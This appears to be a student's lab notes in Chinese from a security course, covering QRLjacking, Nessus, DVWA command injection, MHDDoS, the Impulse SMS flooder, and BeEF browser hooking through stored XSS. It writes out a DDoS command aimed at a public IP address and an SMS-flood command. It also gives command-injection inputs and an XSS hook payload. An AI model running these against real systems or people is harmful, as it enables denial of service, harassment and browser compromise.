0304實習課 1.QRIJackking實作 先去kali裡面把QRLjacking的套件從github上下載下來 ![螢幕擷取畫面 2024-05-30 162116](https://hackmd.io/_uploads/H1qGw3r4C.png) cd到QRL子目錄後按下LS查看,會看到requirement.txt 檔案,把她打開(指令為:pip install -r requirements.txt) ![螢幕擷取畫面 2024-05-30 162350](https://hackmd.io/_uploads/BkZ2v3B4R.png) 但要注意我們做這個之前要先更新火狐, 更新指令為sudo apt update/sudo apt list --upgradable ![螢幕擷取畫面 2024-05-30 162720](https://hackmd.io/_uploads/SkZYd3rEC.png) 2.更新好之後我們就可以使用剛剛的geckodriver了 一樣先去github把套件安裝下來 ![螢幕擷取畫面 2024-05-30 162918](https://hackmd.io/_uploads/S1XgY2S4C.png) 抓下來之後我們就要進去超級管理員裡面把打開qrljacker.py 指令依序是sudo su/chmod +x geckodriver 最後在依據下述的指令就可以成功進入了! ![螢幕擷取畫面 2024-05-30 163147](https://hackmd.io/_uploads/HJcFFnBNC.png) 進入的畫面每個人都不一樣 但只要有出現這個圖示就代表你成功了 ![螢幕擷取畫面 2024-03-07 094846](https://hackmd.io/_uploads/H1hc83rV0.png) 想知道有哪些指令可以用help,下圖是他可以使用的指令的下半部。 同時也要確認是否是selenium 4.10 以下的版本,要不然會有問題 ![螢幕擷取畫面 2024-03-07 100313](https://hackmd.io/_uploads/Bk3582H4R.png) 下圖示仍有問題的截圖畫面 ![螢幕擷取畫面 2024-03-07 100349](https://hackmd.io/_uploads/S129UnS4R.png) 0318實習(由於Nessus之後業師有更詳細的解釋,這邊只大略提一些) 先去Nessus官方下載(要注意版本要是Linux - Debian - amd64) ![螢幕擷取畫面 2024-05-30 165523](https://hackmd.io/_uploads/HymMJpBN0.png) 到下載的資料夾中查看版本(粉色的那個) ![螢幕擷取畫面 2024-05-15 002231](https://hackmd.io/_uploads/HJy3RhrNC.png) 並且要記得進入超級管理員模式才可以開始執行安裝 指令(sudo su/cd Downloads/ls) 進入後再輸入該指令即可安裝 dpkg -i Nessus-10.7.1-debian10_amd64.deb ![螢幕擷取畫面 2024-05-30 165838](https://hackmd.io/_uploads/rJ4AJTBNC.png) 沒反應的話再輸入此資訊就可以進入nessus /bin/systemctl start nessusd.service ![螢幕擷取畫面 2024-05-21 002231](https://hackmd.io/_uploads/rJyhCnHNA.png) 此為nessus的登入畫面,之後在業師講解時會再有更多更新。 ![螢幕擷取畫面 2024-05-30 170037](https://hackmd.io/_uploads/BklIxTHNA.png) 0328正課 1.DVMA操作與實作 安裝好後要打開DOCKER的DVWA,再前往網站http://localhost:4280 登入admin/password 圖1. ping127.0.0.1 .![螢幕擷取畫面 2024-03-28 104117](https://hackmd.io/_uploads/SJl9IhSUkA.png) 以;座分隔,ls查看目錄內容 ![螢幕擷取畫面 2024-03-28 104630](https://hackmd.io/_uploads/r1q83HLJ0.png) mkdir 0320增加名為0320的物件 ![螢幕擷取畫面 2024-03-28 104938](https://hackmd.io/_uploads/Hk5I2rIJC.png) 127.0.0.1&& cat index.php 輸入該指令會可以將檔案輸出至畫面 ![螢幕擷取畫面 2024-03-28 105342](https://hackmd.io/_uploads/rkl5I3SUyA.png) 指令練習 type(打開文字檔) ![螢幕擷取畫面 2024-03-28 232828](https://hackmd.io/_uploads/ryc8nH810.png) 刪除文檔 ![螢幕擷取畫面 2024-03-28 232957](https://hackmd.io/_uploads/Hk5I3HLkR.png) dir 打開目錄 ![螢幕擷取畫面 2024-03-28 233015](https://hackmd.io/_uploads/Skgc82H81C.png) 顯示系統資訊 ![螢幕擷取畫面 2024-03-28 233149](https://hackmd.io/_uploads/HJcL3BUkC.png) 顯示或修改指定檔案上的判別存取控制清單 ![螢幕擷取畫面 2024-03-28 233323](https://hackmd.io/_uploads/HylqIhBIk0.png) tasklist檢查本機或遠端 server 上正在執行的程序 ![螢幕擷取畫面 2024-03-28 233431](https://hackmd.io/_uploads/BJgcU2rL1C.png) ![螢幕擷取畫面 2024-03-28 233508](https://hackmd.io/_uploads/SycU2rLkC.png) 2.COMMAND INJECTION介紹 Command Injection(命令注入弱點)是一種常見的網頁注入攻擊行為,若管理者未在網站的輸入表單中正確過濾敏感字元,攻擊者有則可能透過這些進入點,將指令傳送至Server本機中執行後,再將執行結果透過動態網頁語言輸出,藉此獲取機敏資訊或執行未經授權的任意指令。 0325實習是助教針對還沒完成nessus安裝的同學再一次的提醒跟基礎講解,一樣我們等之後的業師一併講解。 0429實習課~DDOS攻擊測試[https://github.com/MatrixTM/MHDDoS] 1.到github前往安裝套件並開啟(之前必須先確認自己的docker是否安裝完成) 有三行指令需要完成 (git clone https://github.com/MatrixTM/MHDDoS.git/) (cd MHDDoS) (pip install -r requirements.txt) ![螢幕擷取畫面 2024-05-21 162428](https://hackmd.io/_uploads/SyDngCrNC.png) 好了之後即可輸入python3 start.py來啟動該服務 ![螢幕擷取畫面 2024-05-21 162854](https://hackmd.io/_uploads/H1DngABVR.png) ![螢幕擷取畫面 2024-05-21 162940](https://hackmd.io/_uploads/SyP3xCrNC.png) 最後在terminal中輸入攻擊的指令start.py GET http://37.187.56.77 1 10000 sock.txt 1000 10000 ![螢幕擷取畫面 2024-05-21 163422](https://hackmd.io/_uploads/B1PhlArEC.png) 最後一張圖是指該網站被攻擊後所呈現的樣子 ![螢幕擷取畫面 2024-05-21 163457](https://hackmd.io/_uploads/rku2lCHEA.png) 0506實習 Impulse 安裝 進入kali 打開火狐並輸入網址https://github.com/LimerBoy/Impulse 來執行 ![螢幕擷取畫面 2024-06-12 101648](https://hackmd.io/_uploads/HkhXtcIrC.png) 根據他下面的下載輸入以下指令 sudo apt update sudo apt install python3 python3-pip git -y cd Impulse pip3 install -r requirements.txt git clone https://github.com/LimerBoy/Impulse ![螢幕擷取畫面 2024-06-12 102232](https://hackmd.io/_uploads/H127YqIS0.png) ![螢幕擷取畫面 2024-06-12 102323](https://hackmd.io/_uploads/ryh7K5USR.png) ![螢幕擷取畫面 2024-06-12 102350](https://hackmd.io/_uploads/Hk3Qt9Lr0.png) 當你成功進去impulse後,輸入範例的攻擊指令 python3 impulse.py –method SMS –time 20 –threads 15 –target +380123456789 ![螢幕擷取畫面 2024-06-12 102726](https://hackmd.io/_uploads/H13Qt58SR.png) 接下來是與5/20實習課有關的操作 beef的滲透與測試 首先要記得先打開terminal 進入超級管理員模式 sudo su 接著下載beef-xss(指令apt install beef-xss) 當你下載好之後請關掉terminal 並且執行(sudo beef-xss)會看到他給你一串網址,請打開網址後便會進入ui介面 ![螢幕擷取畫面 2024-06-12 103420](https://hackmd.io/_uploads/Hy27t98rR.png) 為避免帳號密碼記不得 我就用beef/kali作為我的帳號密碼 此為登入後的畫面 ![螢幕擷取畫面 2024-06-12 103450](https://hackmd.io/_uploads/BJ3QY58SC.png) 再來我們要打開我們的DVWA (打開TERMINAL docker run --rm -it -p 8080:80 kaakaww/dvwa-docker:latest)註 請不要直接複製貼上,要不然會遇到權限問題 ![螢幕擷取畫面 2024-06-12 104849](https://hackmd.io/_uploads/SynmtqUrA.png) 確認後DVWA是最基礎的安全LEVEL之後請到 XSS(Reflected) 並輸入[<script>alert("xss")</script>] 當他跟你說hello的時候代表歐虧了 ![螢幕擷取畫面 2024-06-12 104929](https://hackmd.io/_uploads/SyhQYcLSC.png) 來到terminal_beef那邊看到Hook,把它複製下來貼在XSS(STORE)上 再來去TERMINAL那邊ifconfig獲取自己的ip位置,把ip改成自己的 但當你想這麼做的時候發現不行,因為XSS(STORE)的Message裡面限制你只能輸入50個字 ![螢幕擷取畫面 2024-06-12 105029](https://hackmd.io/_uploads/r1hXKc8HR.png) 為了解決這個問題,我們去ctrl+shift+I 來打開網頁開發者工具 把字改成100就好 ![螢幕擷取畫面 2024-06-12 105339](https://hackmd.io/_uploads/BynmK5IrC.png) 會發現已經可以輸入了!再按下sign ![螢幕擷取畫面 2024-06-12 105525](https://hackmd.io/_uploads/ry3XKq8rR.png) 回到beef中你會發現左邊多了一個剛剛從dvwa建立的東東 ![螢幕擷取畫面 2024-06-12 105547](https://hackmd.io/_uploads/Sy2XtqUBR.png) 打開social engineering 測試Fake Notification Bar ![螢幕擷取畫面 2024-06-12 105629](https://hackmd.io/_uploads/SynXK9ISA.png) 按下network圖示 代表他已經連上去了 恭喜完成! ![螢幕擷取畫面 2024-06-12 105707](https://hackmd.io/_uploads/SkhXtcUHC.png)